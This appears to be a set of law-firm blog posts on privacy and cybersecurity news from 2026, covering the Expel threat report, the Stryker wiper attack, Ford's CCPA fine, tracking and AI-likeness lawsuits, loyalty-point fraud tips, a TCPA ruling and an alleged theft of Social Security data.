Cybersecurity firm Expel recently published its 2026 Threat Report, which analyzed over 1,000,000 alerts in its Security Operations Center throughout 2025. The results showed that threat actors continue to use compromised credentials to gain access to company systems. The Report highlights the need for companies to educate their employees on an ongoing basis of how important it is to protect their usernames and passwords and to be highly vigilant when being asked to divulge them.

According to the Report, more than 68% of reported incidents were identity-based: where a threat actor attempts to use an authorized user’s credentials to access a company’s network. Many used agents that the organization did not authorize, a clear indication that it was not the authorized user trying to logon. In addition, 12% of incidents involved a logon from a suspicious location, showing that companies may wish to monitor and block any logon attempts from unauthorized locations, including foreign countries.

The Report notes that “fake PDF editors continue to be a major problem.” If a user does not have access to a company sanctioned PDF editor, users may search on the Internet for one to assist with editing a PDF to make a project easier. If a user downloads a fake PDF editor like SupremePDF, the user is unaware that the fake PDF editor can “install backdoors, hijack users’ browsers, access stored credentials, execute arbitrary code, intercept sensitive information, and download arbitrary payloads.”

According to Expel,

these “PDF editors” are actually trojans, which use their safe-looking outer shell to establish a foothold on your endpoints. The malware maintains persistence, making sure that the software creates a service that runs on the endpoint, keeping the PDF editor running. We often see these editors then used as a backdoor to run malicious code on the host, commonly abusing encoded PowerShell to download a second payload.

Once the threat actor downloads the second payload, it can then move laterally on the network and steal data. Companies may wish to consider providing a sanctioned PDF editor so users are not tempted to find one on the Internet. This is another security tip to pass along to users as many unsuspecting users have no idea that threat actors use these tools to gain access to a network.

If you haven’t scheduled your cybersecurity annual training yet, now is the time. There are new (and old) schemes that threat actors are using to attack users and keeping your employees abreast of these schemes heightens their awareness and vigilance, which protects company data.

As we reported last week, Stryker was attacked by Iranian-backed hackers in retaliation for Israeli and U.S. strikes against Iran. It was a significant cyberattack, known as a wiper attack. A wiper attack is designed not to extort money from a victim, but instead to send a message and destroy the victim’s data to cripple their operations. Stryker was a victim of a political attack that had a significant negative effect on its business operations. It was merely conducting business and got caught in the crosshairs of an international war.

Stryker has been transparent about the incident and how it has affected its products. Being a victim of a wiper attack is bad enough. But unfortunately, it became victimized again when, while responding to the cyberattack, it was sued by a former customer service employee alleging that Stryker failed to secure data and alleging a data breach. It is confounding to me to try to understand how the plaintiff can possibly allege a data breach when the attack just happened and an investigation was just starting.

The facts surrounding the Stryker attack will continue to develop, and Stryker will no doubt comply with an legal obligations that ultimately arise from the incident. That said, it is deeply disappointing to see an opportunistic plaintiff and counsel hit Stryker before facts are known, before any notification letters are sent (if even applicable), and while the company was down and actively responding to a significant attack.

Stryker should be allowed the time to assess what happened, respond appropriately, restore its operations, and complete its investigation before anyone determines whether a viable claim exists. Filing suit within days of the incident is premature and only serves as a distraction.

I feel particular empathy toward Stryker, as it took the hit for a political message—something that could have happened to any company. We  should learn from this incident and support the company, rather than pile on while it is still working to recover.

The California Privacy Protection Agency (CPPA) issued a decision requiring Ford Motor Company to pay a fine of $375,703 and update its privacy practices following a settlement for its alleged violations of the California Consumer Privacy Act (CCPA). Under the CCPA, California residents have the right to direct a business to stop selling or sharing their personal information by opting out. According to the CPPA’s decision, Ford’s opt-out process for personal information collected through its digital properties and connected vehicle services required an identity verification step. Specifically, consumers had to verify their email address as part of the opt-out workflow. The CPPA concluded this added “unnecessary friction” for consumers trying to exercise their rights.

The result was not just added inconvenience, but the CPPA stated that Ford did not process opt-out requests unless the consumer completed the email verification step. Following the CPPA’s investigation, Ford has since processed opt-out requests that lacked verification. Further, in addition to the monetary fine, Ford must also conduct an audit of the tracking technologies on its website and ensure compliance with opt-out preference signals, including the Global Privacy Control.

This enforcement action highlights an increasingly practical regulatory focus. The question is not only whether an opt-out mechanism exists on paper, but also whether it works in a way that consumers can realistically use.

This matter signals that the CPPA is looking at the connected vehicle ecosystems and related digital properties, not just traditional web-only businesses. The lesson here is that if consumers must take extra steps that are not essential to submit or effectuate an opt-out, regulators may view that as deterring a consumer’s ability to exercise their rights.

A federal court in the Southern District of California declined to dismiss wiretapping and eavesdropping claims tied to Skullcandy Inc.’s alleged use of online trackers on its retail website, allowing the lawsuit to move forward. Plaintiff alleges that Skullcandy used tracking tools from Meta Platforms and Google to collect browser and purchase data. Jones v. Skullcandy, Inc., No. 3:2025cv01759 (S.D. Cal. 3/12/26).

The allegations include the use of the Meta Pixel, Google Analytics, and DoubleClick in violation of the California Invasion of Privacy Act. Skullcandy argued the California court lacked jurisdiction, but the district court judge was persuaded that it could exercise specific jurisdiction, focusing on the allegation that Skullcandy aimed its conduct at California through the use of the tracking technologies at issue. Skullcandy sought to transfer the case to Utah, where it has its principal place of business—the court was not convinced. The court focused on the fact that the plaintiff chose to sue in California where the alleged conduct took place, and that the plaintiff expected that class members would be in that state. This decision highlights that venue and jurisdiction defenses may be difficult to win when plaintiffs tie the alleged tracking conduct to the forum state. Even if your website terms of use call out governing law as the state in which you have your principal place of business, you may still be stuck in California court.

A recent class action complaint filed in the Southern District of New York, Angwin v. Superhuman Platform, Inc., No. 26 Civ. 02005, 2026 WL 704131 (S.D.N.Y. 3/11/26), highlights an evolving issue in artificial intelligence (AI) product design: what happens when an AI feature uses a real person’s name or identity as part of the user experience and that identity becomes part of what is being sold?

In the Angwin complaint, the plaintiff (a journalist and editor) alleges that Superhuman (the parent company of the writing assistant tool Grammarly) misappropriated the names and identities of hundreds of journalists, authors, writers, and editors to earn profits. The complaint focuses on Grammarly’s now-disabled “Expert Review” feature, which let subscribers pay for comments attributed to famous writers without their consent, including Angwin herself, Stephen King, and Carl Sagan.

The complaint underscores that AI risk is not limited to AI producing output. The risk is also about how the product attributes that output to real people. The complaint alleged that the Grammarly app told users it was picking experts to review their draft and then gave feedback as if it came from those named people, including short biographies for those experts. The pleading further describes inline editing-style comments that appear next to passages of the user’s text under an expert’s name, and a deeper view where the product explains that a particular recommendation is “inspired” by the selected expert. The complaint also alleges that the system draws on the experts’ publicly available writing to generate advice the experts did not actually provide. The concern is not only unauthorized use of a name in marketing, but also the possibility that ordinary users could reasonably come away believing they received guidance from, or endorsed by, the named person, even where the person was not involved in the review and might disagree with what is attributed to them.

Much of the conversation surrounding developing or deploying AI products centers on concerns about AI output accuracy and intellectual property infringement. Angwin, however,is a lesson that if an AI tool uses a person’s name as part of the product’s value proposition, especially in a way that reads like participation or endorsement, likeness claims could also be at play. Companies should be mindful of what their AI interface suggests about the source of its output. If the product uses a well-known identity to make a feature seem more credible or relatable, it’s advisable to get permission before using that person’s name in this way. A recognizable name can certainly add value, but Angwin is a reminder that it can also add legal risk.

While a good friend of mine was recently traveling, his flight was cancelled and he was booked on a new flight the next day. He travels a lot and he decided to use some of his hotel loyalty points to stay over at the hotel adjacent to the airport. Checking in, he discovered that more than a million miles had been stolen from his account. It was obviously very distressing, so he asked me to write about it to warn others of this fraud and how it can be prevented.

This type of online fraud is called loyalty fraud. Loyalty fraud is when threat actors steal loyalty points from hotel or airline accounts that store frequent stay or flyer miles. In 2023, it was estimated that one in four online fraud attempts included loyalty fraud.   

Typically, threat actors gain access to loyalty accounts through phishing tactics to steal login credentials of the legitimate user. This can be done through fake emails or redirecting users to fake websites that look legitimate, and then requesting their credentials to gain access to their account. Threat actors also use credential stuffing and use stolen usernames and passwords from other breaches to gain access to loyalty point accounts.

Once they gain access to the account with legitimate credentials, the threat actor can change the password and lock the user out of the account, can redeem the points, or quickly sell the points on the dark web or on social media platforms. It then becomes very difficult to get those points back, as the hotel chain or airline will say that there was no evidence that an unauthorized user obtained the points because the access was obtained through legitimate credentials.

So how do we protect those points that we have been gathering throughout our lifetime?

  • Use strong, unique passwords for all loyalty accounts. Treat the accounts like bank accounts, because that is what they are.
  • Change passwords frequently, like other critical accounts.
  • Enable multi-factor authentication on all loyalty accounts to add an extra layer of security.
  • Monitor loyalty accounts regularly so you can catch any unusual activity in your account.
  • Be cautious when using public Wi-Fi to access loyalty accounts.
  • Don’t provide your username and password unless you are sure you are on the correct site.
  • Use a healthy dose of paranoia before opening an advertisement or when redirected to a hotel or airline website. It is unusual to have to insert a username and password to get access to a deal.
  • Make sure you are logging on to the official website of the hotel or airline.
  • If you receive notice from a hotel or airline that it suffered a data breach, immediately change your password.

Loyalty accounts should be treated no differently than bank accounts. Using similar security techniques used with other critical accounts will help prevent you from becoming a victim to fraud.

With the background of recent government warnings about increased cyber-attacks from Iranian-backed hackers, the Irish Examiner has reported that the Stryker site located in Cork, Ireland has been hit with a wiper attack by the Iranian-backed Handala Hacking Team.

The Stryker facility in Cork employs approximately 5,000 individuals and “has been crippled by a cyberattack” being described as a wiper attack, which wipes all of the targeted system’s data and is politically motivated.

According to the Irish Examiner, the Cork Stryker site’s IT systems have been “’shut down’” and Stryker employee devices have been wiped out. The login pages appearing on these devices have been defaced with the Handala logo. The attack, believed to be a response to business links with Israel, has affected Stryker’s Microsoft environment. .

Israeli media reports that Handala has also claimed responsibility for hacking the Academy of Hebrew Language website, and the Israeli National Cyber Directorate is trying to intercept “a wave of Iranian cyberattacks on Israeli civilian companies.”

The U.S. government has warned U.S. based companies to be on heightened alert for Iranian-backed cyber attacks in retaliation for the strikes against Iran. This attack against Stryker makes this warning an urgent reminder to review the warnings and mitigation actions

The U.S. District Court for the Northern District of Georgia, in Veronica Bramlett, on behalf of herself and all others similarly situated v. RES 360 LLC and Peach City Properties LLC, No. 1:25-CV-3312-MLB (N.D. Ga. Mar. 4, 2026) recently granted in part and denied in part a motion to dismiss a Telephone Consumer Protection Act (TCPA) telephone solicitation claim based on text messages offering to buy the plaintiff’s home.

The complaint alleged that defendants—who offer real estate-related services—sent multiple texts offering to buy the plaintiff’s home and emphasizing a “quick,” “easy,” “hassle-free” transaction, including the ability to close quickly and avoid a public listing. The plaintiff alleged she was on the national do-not-call registry, had no prior relationship with the defendants, had not requested their assistance, and was not interested in selling. The defendants moved to dismiss on the theory that their messages were not telephone solicitations under the TCPA.

The court held the plaintiff plausibly alleged a prohibited purpose because, taking the allegations as true, the defendants’ model was to “take care of all aspects of the transaction” and provide multiple services offered by a real estate agent, charge a fee for those services, and derive profit from that fee. Reading the “hassle-free” and “take the burden off [Plaintiff’s] shoulders” language of the texts in that alleged context, the court found it plausible the texts were intended to encourage the purchase of services and therefore constituted solicitations, even if the texts did not explicitly mention services.

However, the court allowed the claim to proceed only insofar as the plaintiff alleged that the defendants implicitly offered to handle aspects of the transaction in exchange for a fee baked into the home purchase price. The court dismissed other “telephone solicitation” theories, including that the texts were sent to sell other offerings such as loan services, investment opportunities, construction/renovation, conventional brokerage representation, or an option to buy a home from the defendants, because the content of the texts did not support those theories, even considering context and the totality of the allegations.

Bramlett may support a broader point that a marketing text message can be treated as a TCPA telephone solicitation if, in context, it plausibly has the purpose of encouraging the recipient to purchase the sender’s services, even if the message does not explicitly mention those services. Companies sending marketing messages should assess outreach with the expectation that courts may look beyond the face of the message to its context and business model in deciding whether it was sent “for the purpose of encouraging” the purchase of services. On the other hand, plaintiffs may face the burden to prove a clear nexus between the message content and the solicitation theory, and broad theories untethered to what the messages actually say could risk dismissal. Bramlett underscores that how a message reads in context, and not just on what it says expressly, matters.

Microsoft Threat Intelligence issued a report on March 6, 2026, entitled, “AI as tradecraft: How threat actors operationalize AI,” which outlines how threat actors, including those from North Korea, are “operationalizing AI along the cyberattack lifecycle…to bypass safeguards and perform malicious activity.” The threat actors are adopting AI “as operational enablers, embedding AI into their workflows to increase the speed, scale, and resilience of cyber operations.”

The report details how North Korean remote IT worker schemes dubbed Jasper Sleet and Coral Sleet provides the threat actors with “sustained, large-scale misuse of legitimate access through identity fabrication, social engineering, and long-term operational persistence at low cost.” The threat actors are also toying with the  agentic AI use, which could “complicate detection and response.”

The report outlines how the threat actors have incorporated automation into their schemes across the attack lifecycle to ensure North Korean threat actors are “hired, stay hired, and misuse access at scale” at global companies.

The report is a must read for any company that has been hit before by the North Korean tech worker scheme, or those who have not yet been hit, but recruit remote workers for technology positions.

The Washington Post has published a report detailing a whistleblower complaint alleging that a former Department of Government Efficiency (DOGE) employee stole two complete databases from the U.S. Social Security Administration while employed as a DOGE software engineer.

The databases stolen include the “’Numident’ and the ‘Master Death File,’ which could cover records for more than 500 million living and dead Americans, including Social Security numbers and birth data.”

First of all, how did a software engineer even have access to these databases that contain highly sensitive data, and then have the ability to download massive amounts of data on 500 million individuals to a thumb drive? My head is exploding.

Second, the whistleblower alleges that the software engineer left DOGE in October 2025 to start a new job at a government contractor, “where he told colleagues he ‘possessed two tightly restricted databases of U.S. citizens’ information’ and planned to share that information with his new employer.” If the software engineer did so, not only are both against the law, but are separate unauthorized disclosures that may require notification to every person whose data is contained on those databases. My head is imploding now too.

The Social Security Administration inspector general is allegedly investigating the whistleblower’s complaint, but the allegations are extremely alarming, and an investigation is not sufficient. Who knows how long it will take for the investigation to conclude? Meanwhile, if true, potentially all of our Social Security data on a thumb drive is in the hands of a software engineer, who clearly does not understand the importance and consequences of their actions, and potentially the individual’s new employer. Laws have been passed to protect our Social Security information for a reason. We expect it to be protected and accessed, used, and disclosed in accordance with the law. If true, this situation underscores how important those laws are, and how detrimental it is when they are broken with impunity.